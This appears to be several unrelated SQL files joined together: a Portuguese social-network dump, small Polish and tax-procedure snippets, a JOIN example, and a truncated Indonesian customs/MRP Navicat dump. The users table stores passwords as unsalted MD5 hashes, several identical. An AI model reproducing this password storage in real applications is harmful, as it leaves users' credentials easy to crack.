int(11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `posts` -- INSERT INTO `posts` (`id`, `id_usuario`, `data_criacao`, `tipo`, `texto`, `url`, `id_grupo`) VALUES (2, 1, '2016-08-27 05:57:58', 'foto', 'Teste de envio de imagem com texto...', '91b1addbcc2f6b6e25e8742e096c971c.png', 0), (3, 1, '2016-08-27 05:59:29', 'texto', 'Mais algumas', '', 0), (4, 1, '2016-08-27 05:59:32', 'texto', 'De texto', '', 0), (5, 1, '2016-08-27 06:16:04', 'texto', 'Algum texto de exemplo', '', 0), (6, 2, '2016-08-27 06:17:03', 'texto', 'Minha postagem de fulano...', '', 0), (7, 1, '2016-08-27 06:17:25', 'texto', 'Algum outro', '', 0), (8, 2, '2016-08-27 07:43:41', 'texto', 'Teste de postagem no grupo de Bonieky...', '', 2), (9, 1, '2016-08-27 07:44:57', 'texto', 'Que legal Fulano...', '', 2); -- -------------------------------------------------------- -- -- Estrutura da tabela `posts_comentarios` -- CREATE TABLE `posts_comentarios` ( `id` int(11) UNSIGNED NOT NULL, `id_post` int(11) DEFAULT NULL, `id_usuario` int(11) DEFAULT NULL, `data_criacao` datetime DEFAULT NULL, `texto` text ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `posts_comentarios` -- INSERT INTO `posts_comentarios` (`id`, `id_post`, `id_usuario`, `data_criacao`, `texto`) VALUES (1, 7, 1, '2016-08-27 06:56:24', 'Teste legal'); -- -------------------------------------------------------- -- -- Estrutura da tabela `posts_likes` -- CREATE TABLE `posts_likes` ( `id` int(11) UNSIGNED NOT NULL, `id_post` int(11) DEFAULT NULL, `id_usuario` int(11) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `posts_likes` -- INSERT INTO `posts_likes` (`id`, `id_post`, `id_usuario`) VALUES (2, 7, 2), (3, 7, 1), (4, 6, 1), (6, 2, 1); -- -------------------------------------------------------- -- -- Estrutura da tabela `relacionamentos` -- CREATE TABLE `relacionamentos` ( `id` int(11) UNSIGNED NOT NULL, `usuario_de` int(11) DEFAULT NULL, `usuario_para` int(11) DEFAULT NULL, `status` tinyint(1) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `relacionamentos` -- INSERT INTO `relacionamentos` (`id`, `usuario_de`, `usuario_para`, `status`) VALUES (1, 1, 4, 1), (2, 4, 3, 1), (3, 1, 5, 1), (4, 1, 3, 1), (5, 1, 2, 1), (6, 3, 4, 1); -- -------------------------------------------------------- -- -- Estrutura da tabela `usuarios` -- CREATE TABLE `usuarios` ( `id` int(11) UNSIGNED NOT NULL, `email` varchar(100) DEFAULT NULL, `nome` varchar(100) DEFAULT NULL, `sexo` tinyint(1) DEFAULT NULL, `bio` text, `senha` varchar(32) NOT NULL DEFAULT '' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `usuarios` -- INSERT INTO `usuarios` (`id`, `email`, `nome`, `sexo`, `bio`, `senha`) VALUES (1, 'suporte@b7web.com.br', 'Bonieky Lacerda', 1, 'Esta é minha biografia... Esse sou quem eu sou.', '698dc19d489c4e4db73e28a713eab07b'), (2, 'fulano@hotmail.com', 'Fulano', 1, NULL, '202cb962ac59075b964b07152d234b70'), (3, 'cicrano@hotmail.com', 'Cicrano', 0, NULL, '202cb962ac59075b964b07152d234b70'), (4, 'beltrano@hotmail.com', 'Beltrano', 1, NULL, '202cb962ac59075b964b07152d234b70'), (5, 'zibrano@hotmail.com', 'Zibrano', 1, NULL, '202cb962ac59075b964b07152d234b70'), (6, 'greltranio@hotmail.com', 'Greltranio', 1, NULL, '202cb962ac59075b964b07152d234b70'); -- -- Indexes for dumped tables -- -- -- Indexes for table `grupos` -- ALTER TABLE `grupos` ADD PRIMARY KEY (`id`); -- -- Indexes for table `grupos_membros` -- ALTER TABLE `grupos_membros` ADD PRIMARY KEY (`id`); -- -- Indexes for table `posts` -- ALTER TABLE `posts` ADD PRIMARY KEY (`id`); -- -- Indexes for table `posts_comentarios` -- ALTER TABLE `posts_comentarios` ADD PRIMARY KEY (`id`); -- -- Indexes for table `posts_likes` -- ALTER TABLE `posts_likes` ADD PRIMARY KEY (`id`); -- -- Indexes for table `relacionamentos` -- ALTER TABLE `relacionamentos` ADD PRIMARY KEY (`id`); -- -- Indexes for table `usuarios` -- ALTER TABLE `usuarios` ADD PRIMARY KEY (`id`); -- -- AUTO_INCREMENT for dumped tables -- -- -- AUTO_INCREMENT for table `grupos` -- ALTER TABLE `grupos` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3; -- -- AUTO_INCREMENT for table `grupos_membros` -- ALTER TABLE `grupos_membros` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4; -- -- AUTO_INCREMENT for table `posts` -- ALTER TABLE `posts` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10; -- -- AUTO_INCREMENT for table `posts_comentarios` -- ALTER TABLE `posts_comentarios` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2; -- -- AUTO_INCREMENT for table `posts_likes` -- ALTER TABLE `posts_likes` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7; -- -- AUTO_INCREMENT for table `relacionamentos` -- ALTER TABLE `relacionamentos` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7; -- -- AUTO_INCREMENT for table `usuarios` -- ALTER TABLE `usuarios` MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
insert into client(id, name, description) values (1, 'Nowak sp. z o.o.', 'Stała współpraca'), (2, 'Jak Kowalski', 'Z polecenia Jana Nowaka, drobne zlecenia co kilka miesięcy');
Create Procedure sp_Insert_TaxD(@Desc nvarchar(2000), @LST Decimal(18, 6),@CST Decimal(18, 6), @LApl Decimal(18, 6), @LPrt Decimal(18, 6), @CApl Decimal(18, 6), @CPrt Decimal(18, 6)) As Insert InTo Tax(Tax_Description, Percentage, CST_Percentage, LSTApplicableOn, LSTPartOff, CSTApplicableOn, CSTPartOff) Values (@Desc, @LST, @CST, @LApl, @LPrt, @CApl, @CPrt)
-- Get data from two tables in a database -- use JOIN SELECT tv_shows.title, tv_show_genres.genre_id FROM tv_shows JOIN tv_show_genres WHERE tv_shows.id = tv_show_genres.show_id ORDER BY tv_shows.title, tv_show_genres.genre_id ASC;
/* Navicat MySQL Data Transfer Source Server : MySql Source Server Version : 50525 Source Host : localhost:3306 Source Database : mrp_yanjin Target Server Type : MYSQL Target Server Version : 50525 File Encoding : 65001 Date: 2012-12-06 12:23:35 */ SET FOREIGN_KEY_CHECKS=0; -- ---------------------------- -- Table structure for `api` -- ---------------------------- DROP TABLE IF EXISTS `api`; CREATE TABLE `api` ( `KdApit` tinyint(1) NOT NULL COMMENT 'kode API/T', `UrApit` varchar(15) DEFAULT NULL COMMENT 'Uraian API/T', PRIMARY KEY (`KdApit`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of api -- ---------------------------- INSERT INTO api VALUES ('1', 'API'); INSERT INTO api VALUES ('2', 'APIT'); -- ---------------------------- -- Table structure for `barang` -- ---------------------------- DROP TABLE IF EXISTS `barang`; CREATE TABLE `barang` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `no` int(2) NOT NULL COMMENT 'No. Urut', `fgmat_id` int(11) DEFAULT NULL COMMENT 'Kode Dokumen', `KdBarang` varchar(11) NOT NULL DEFAULT '', `UrBarang` varchar(100) NOT NULL DEFAULT '' COMMENT 'Nomor Dokumen', `KdGunaBarang` varchar(1) DEFAULT NULL, `Negara` varchar(50) DEFAULT NULL, `HE` decimal(12,2) DEFAULT NULL COMMENT 'Harga Ekspor Barang', `Tarif` varchar(50) DEFAULT NULL, `qty` int(11) DEFAULT NULL, `unit` varchar(11) DEFAULT NULL, `price` decimal(12,2) DEFAULT NULL, `kurs` decimal(12,2) DEFAULT NULL, `VOL` decimal(12,4) DEFAULT NULL COMMENT 'Tanggal Dokumen', `NETTO` decimal(12,2) DEFAULT NULL, `CIF` decimal(12,2) DEFAULT NULL COMMENT 'Nilai CIF', `FOB` decimal(12,2) DEFAULT NULL, `HrgSerah` decimal(12,2) DEFAULT NULL, `Ket` varchar(200) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`KdBarang`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of barang -- ---------------------------- INSERT INTO barang VALUES ('1', '000700', '1', null, 'MAT-0001', '1', '1', null, null, '2', '1', null, null, null, null, '2.00', '1.00', null, null, null); INSERT INTO barang VALUES ('1', '000701', '1', null, 'M001', 'Mesin A', 'u', null, null, 'undefined', '100', null, null, null, null, '0.00', '0.00', null, null, null); INSERT INTO barang VALUES ('1', '000701', '2', null, 'P001', 'PC', 'u', null, null, 'undefined', '200', null, null, null, null, '0.00', '0.00', null, null, null); INSERT INTO barang VALUES ('3', '000001', '1', null, 'FG-01', 'tes', '1', 'ID', null, '1', '2', null, null, null, '2.0000', '1.00', '1.00', null, '293512254.00', null); INSERT INTO barang VALUES ('3', '000002', '1', null, 'M001', 'Mesin A', 'u', 'undefined', null, 'undefined', '5', null, null, null, '0.0000', '0.00', '0.00', null, '0.00', null); INSERT INTO barang VALUES ('3', '201207', '1', null, 'FG-01', 'tes', '1', 'ID', null, '1', '2', null, null, null, '2.0000', '1.00', '1.00', null, '2.00', null); INSERT INTO barang VALUES ('4', '000001', '1', null, 'FG-01', 'tes', null, 'ID', null, '1', '2', null, null, null, '1.0000', '1.00', '1.00', null, null, null); INSERT INTO barang VALUES ('4', '000002', '1', null, 'M001', 'Mesin A', null, 'undefined', null, 'undefined', '5', null, null, null, '0.0000', '0.00', '0.00', null, null, null); INSERT INTO barang VALUES ('5', '000001', '1', null, 'MAT-0001', 'tes', null, 'ID', null, '2', '1', null, null, null, '2.0000', '2.00', '2.00', null, null, null); INSERT INTO barang VALUES ('5', '000002', '1', null, 'ALME0002', 'Extrusion+Ecotrio', null, null, null, null, '200', null, null, null, '0.0000', '0.00', '0.00', null, null, null); INSERT INTO barang VALUES ('6', '000001', '1', null, 'FG-01', 'tes', null, null, null, null, '1', null, null, null, '1.0000', '2.00', '2.00', null, '1.00', null); INSERT INTO barang VALUES ('6', '000001', '3', null, 'FG-02', '2', null, null, null, null, '1', null, null, null, '0.0000', '2.00', '2.00', null, '0.00', null); INSERT INTO barang VALUES ('6', '000001', '2', null, 'MAT-0001', 'tes', null, null, null, null, '1', null, null, null, '0.0000', '2.00', '2.00', null, '0.00', null); INSERT INTO barang VALUES ('6', '000001', '4', null, 'MAT-0002', '222', null, null, null, null, '1', null, null, null, '0.0000', '2.00', '2.00', null, '0.00', null); INSERT INTO barang VALUES ('6', '000002', '1', null, 'M001', 'Mesin A', null, null, null, null, '5', null, null, null, '0.0000', '0.00', '0.00', null, '0.00', null); INSERT INTO barang VALUES ('7', '000001', '1', null, 'FG-01', 'tes', null, null, '1.00', '2', '1', null, null, null, null, '2.00', null, '2.00', null, null); INSERT INTO barang VALUES ('7', '000002', '1', null, '123', 'Heatsink', null, null, '0.00', 'undefined', '200', null, null, null, null, '0.00', null, '0.00', null, null); INSERT INTO barang VALUES ('8', '000001', '1', null, 'FG-01', 'tes', null, null, null, null, '1', null, null, null, '2.0000', '2.00', null, null, '1.00', null); INSERT INTO barang VALUES ('8', '000002', '1', null, 'M001', 'Mesin A', null, null, null, null, '100', null, null, null, '50.0000', '0.00', null, null, '200.00', null); INSERT INTO barang VALUES ('8', '000002', '2', null, 'P001', 'PC', null, null, null, null, '200', null, null, null, '0.0000', '120.00', null, null, '100.00', null); INSERT INTO barang VALUES ('8', '000003', '1', null, 'M001', 'Mesin A', null, null, null, null, '100', null, null, null, '0.0000', '0.00', null, null, '200.00', null); INSERT INTO barang VALUES ('8', '000003', '2', null, 'P001', 'PC', null, null, null, null, '200', null, null, null, '0.0000', '0.00', null, null, '100.00', null); INSERT INTO barang VALUES ('9', '000001', '1', null, 'FG-01', 'tes', null, null, null, null, '2', null, null, null, '1.0000', '1.00', null, null, '1.00', null); INSERT INTO barang VALUES ('9', '000002', '1', null, 'M001', 'Mesin A', null, null, null, null, '5', null, null, null, '0.0000', '0.00', null, null, '0.00', null); -- ---------------------------- -- Table structure for `barangkembali` -- ---------------------------- DROP TABLE IF EXISTS `barangkembali`; CREATE TABLE `barangkembali` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `no` int(2) NOT NULL COMMENT 'No. Urut', `fgmat_id` int(11) DEFAULT NULL COMMENT 'Kode Dokumen', `KdBarang` varchar(11) DEFAULT NULL, `UrBarang` varchar(100) DEFAULT NULL COMMENT 'Nomor Dokumen', `Negara` varchar(50) DEFAULT NULL, `Tarif` varchar(50) DEFAULT NULL, `qty` int(11) DEFAULT NULL, `unit` varchar(11) DEFAULT NULL, `price` decimal(12,2) DEFAULT NULL, `kurs` decimal(12,2) DEFAULT NULL, `VOL` decimal(12,2) DEFAULT NULL COMMENT 'Tanggal Dokumen', `NETTO` decimal(12,2) DEFAULT NULL, `CIF` decimal(12,2) DEFAULT NULL COMMENT 'Nilai CIF', `HrgSerah` decimal(12,2) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`no`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of barangkembali -- ---------------------------- INSERT INTO barangkembali VALUES ('3', '000001', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000002', '425', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000003', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000004', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000005', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000006', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000007', '267', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000008', '328', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000009', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000010', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000011', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000012', '2', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000013', '2', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000014', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000015', '7', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000016', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000017', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000018', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('3', '000019', '75', '0', '', '', '', '', '0', '', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO barangkembali VALUES ('4', '000001', '1', null, 'MAT-0001', 'tes', null, null, '1', null, null, null, '1.00', '2.00', '2.00', null); INSERT INTO barangkembali VALUES ('5', '000001', '1', null, 'FG-01', 'tes', null, null, '2', null, null, null, '2.00', '1.00', '1.00', null); -- ---------------------------- -- Table structure for `detail` -- ---------------------------- DROP TABLE IF EXISTS `detail`; CREATE TABLE `detail` ( `DokKd` varchar(1) NOT NULL DEFAULT '' COMMENT 'Kode Dokumen BC', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `NoDaf` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pendaftaran', `NoDet` tinyint(2) NOT NULL DEFAULT '0' COMMENT 'No Detail', `BRUTO` decimal(12,2) DEFAULT NULL COMMENT 'Bruto', `CIF` decimal(12,2) DEFAULT NULL COMMENT 'CIF', `HargaSerah` decimal(12,2) DEFAULT NULL COMMENT 'Harga Penyerahan', `NETTO` decimal(12,2) DEFAULT NULL COMMENT 'Netto', `TujKirim` tinyint(1) DEFAULT NULL COMMENT 'Tujuan Pengiriman', `NpwpTuj` varchar(15) DEFAULT NULL COMMENT 'Npwp Tujuan', `UrBarang` varchar(100) DEFAULT NULL COMMENT 'Uraian Barang', PRIMARY KEY (`DokKd`,`CAR`,`NoDaf`,`NoDet`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of detail -- ---------------------------- -- ---------------------------- -- Table structure for `dokumen` -- ---------------------------- DROP TABLE IF EXISTS `dokumen`; CREATE TABLE `dokumen` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `no` int(2) NOT NULL COMMENT 'No. Urut', `DokKd` tinyint(1) DEFAULT NULL COMMENT 'Kode Dokumen', `DokNo` varchar(30) DEFAULT NULL COMMENT 'Nomor Dokumen', `DokTg` date DEFAULT NULL COMMENT 'Tanggal Dokumen', `PosSub` varchar(20) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`no`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of dokumen -- ---------------------------- INSERT INTO dokumen VALUES ('1', '000700', '1', '1', 'MINHS12040145', '2012-04-24', null); INSERT INTO dokumen VALUES ('1', '000700', '2', '17', 'HASL0280D4CDW98', '2012-04-26', null); INSERT INTO dokumen VALUES ('1', '000700', '3', '18', '001995 Pos: 0043 Sub:', '2012-05-05', null); INSERT INTO dokumen VALUES ('1', '000701', '1', '1', '999', '2012-10-31', null); INSERT INTO dokumen VALUES ('3', '000001', '1', '1', '1', '2012-07-25', null); INSERT INTO dokumen VALUES ('3', '000002', '1', '2', '001', '2012-10-31', null); INSERT INTO dokumen VALUES ('3', '201..2', '1', '1', '1', '2012-07-25', null); INSERT INTO dokumen VALUES ('3', '201.20', '1', '1', '1', '2012-07-25', null); INSERT INTO dokumen VALUES ('3', '201207', '1', '1', '1', '2012-07-25', null); INSERT INTO dokumen VALUES ('4', '000001', '1', '2', '1', '2012-07-31', null); INSERT INTO dokumen VALUES ('4', '000002', '1', '1', '001', '2012-10-30', null); INSERT INTO dokumen VALUES ('5', '000001', '1', '2', '2', '2012-07-31', null); INSERT INTO dokumen VALUES ('5', '000002', '1', '1', '001', '2012-10-30', null); INSERT INTO dokumen VALUES ('6', '000001', '1', '1', '1', '2012-08-01', null); INSERT INTO dokumen VALUES ('6', '000001', '2', '12', '2', '2012-08-01', null); INSERT INTO dokumen VALUES ('6', '000002', '1', '1', '777', '2012-10-31', null); INSERT INTO dokumen VALUES ('7', '000001', '1', '1', 'u', '2012-07-17', null); INSERT INTO dokumen VALUES ('7', '000002', '1', '1', '883', '2012-10-31', null); INSERT INTO dokumen VALUES ('8', '000001', '1', '2', '1', '2012-08-01', null); INSERT INTO dokumen VALUES ('8', '000002', '1', '4', '003', '2012-10-29', null); INSERT INTO dokumen VALUES ('8', '000003', '1', '4', 'SJ001', '2012-11-26', null); INSERT INTO dokumen VALUES ('9', '000001', '1', '3', '2', '2012-08-02', null); INSERT INTO dokumen VALUES ('9', '000001', '2', '14', '1', '2012-08-02', null); INSERT INTO dokumen VALUES ('9', '000001', '3', '14', '2', '2012-08-03', null); INSERT INTO dokumen VALUES ('9', '000002', '1', '1', '001', '2012-10-30', null); -- ---------------------------- -- Table structure for `hdrjaminan` -- ---------------------------- DROP TABLE IF EXISTS `hdrjaminan`; CREATE TABLE `hdrjaminan` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `NoJaminan` varchar(20) NOT NULL DEFAULT '', `TgJaminan` date DEFAULT NULL, `JnsJaminan` varchar(15) NOT NULL DEFAULT '', `bayar` decimal(12,2) DEFAULT NULL, `hutang` decimal(12,2) DEFAULT NULL, `TgJatuhTempo` date DEFAULT NULL, `KodeAkun` varchar(10) NOT NULL DEFAULT '', `NoTandaBayar` varchar(20) DEFAULT NULL, `TglTandaBayar` date DEFAULT NULL, `Penjamin` varchar(50) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`JnsJaminan`,`KodeAkun`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrjaminan -- ---------------------------- INSERT INTO hdrjaminan VALUES ('0', '', '', '0000-00-00', '', '0.00', null, '0000-00-00', '', '', '0000-00-00', ''); INSERT INTO hdrjaminan VALUES ('0', '', '', null, 'BM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('0', '', '', null, 'Cukai', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('0', '', '', null, 'PPh', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('0', '', '', null, 'PPN', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('0', '', '', null, 'PPnBM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'BM', '0.00', '1.00', null, '1', '2', '2012-07-18', null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'Cukai', '0.00', '10.00', null, '1', '2', '2012-07-04', null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'PNBP', '0.00', '100.00', null, '1', '2', '2012-07-06', null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'PPh', '0.00', '1000.00', null, '1', '2', '2012-07-01', null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'PPN', '0.00', '10000.00', null, '1', '2', '2012-07-03', null); INSERT INTO hdrjaminan VALUES ('1', '000700', '', null, 'PPnBM', '0.00', '100000.00', null, '1', '2', '2012-07-02', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'BM', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'Cukai', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'PNBP', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'PPh', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'PPN', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('1', '000701', '', null, 'PPnBM', '0.00', '0.00', null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'BM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'BungaPPNPPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'Cukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'DBBMCukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'NTB', null, null, null, 'SSCP', '2', '2012-07-17', null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'NTPN', null, null, null, 'SSP', '2', '2012-07-30', null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'PNBP', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'PPh', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'PPN', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'PPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'SSCP', null, null, null, '', '1', '2012-07-25', null); INSERT INTO hdrjaminan VALUES ('3', '000001', '', null, 'SSP', null, null, null, '', '1', '2012-07-27', null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'BM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'BungaPPNPPnBM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'Cukai', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'DBBMCukai', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'NTPN', null, null, null, 'SSCP', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'NTPN', null, null, null, 'SSP', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'PNBP', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'PPh', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'PPN', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'PPnBM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'SSCP', null, null, null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('3', '000002', '', null, 'SSP', null, null, null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'BM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'BungaPPNPPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'Cukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'DBBMCukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'NTB', null, null, null, 'SSCP', '2', '2012-07-17', null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'NTB', null, null, null, 'SSP', '1', '2012-07-24', null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'PNBP', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'PPh', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'PPN', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'PPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'SSCP', null, null, null, '', '1', '2012-07-25', null); INSERT INTO hdrjaminan VALUES ('3', '201..2', '', null, 'SSP', null, null, null, '', '1', '2012-07-27', null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'BM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'BungaPPNPPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'Cukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'DBBMCukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'NTB', null, null, null, 'SSCP', '2', '2012-07-17', null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'NTB', null, null, null, 'SSP', '1', '2012-07-24', null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'PNBP', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'PPh', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'PPN', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'PPnBM', 